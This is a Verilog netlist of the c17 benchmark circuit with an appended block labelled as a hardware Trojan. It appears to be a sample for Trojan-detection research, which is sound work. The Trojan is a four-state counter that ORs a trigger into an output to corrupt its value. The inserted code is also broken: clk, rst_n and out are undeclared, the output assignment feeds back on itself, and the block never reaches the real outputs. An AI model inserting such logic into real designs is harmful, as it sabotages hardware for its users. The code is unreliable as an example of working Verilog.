
// Generated by Cadence Genus(TM) Synthesis Solution 16.22-s033_1
// Generated on: Jan 17 2020 11:33:08 EST (Jan 17 2020 16:33:08 UTC)

// Verification Directory fv/c17 

module c17(N1, N2, N3, N6, N7, N22, N23);
  input N1, N2, N3, N6, N7;
  output N22, N23;
  wire N1, N2, N3, N6, N7;
  wire N22, N23;
  wire N10, N11, N16, N19;
  nand NAND2_1 (N10, N1, N3);
  nand NAND2_2 (N11, N3, N6);
  nand NAND2_3 (N16, N2, N11);
  nand NAND2_4 (N19, N11, N7);
  nand NAND2_5 (N22, N10, N16);
  nand NAND2_6 (N23, N16, N19);

// ---------------- Trojan: FSM-trigger + OR payload ----------------
reg [1:0] troj_state_0;
always @(posedge clk or negedge rst_n) begin
    if (!rst_n) troj_state_0 <= 2'b00;
    else case(troj_state_0)
        2'b00: troj_state_0 <= 2'b01;
        2'b01: troj_state_0 <= 2'b10;
        2'b10: troj_state_0 <= 2'b11;
        2'b11: troj_state_0 <= 2'b00;
    endcase
end

wire troj_trig_0 = (troj_state_0 == 2'b11);

// Payload: OR injection
wire out_troj_0 = out | troj_trig_0;
assign out = out_troj_0;

endmodule

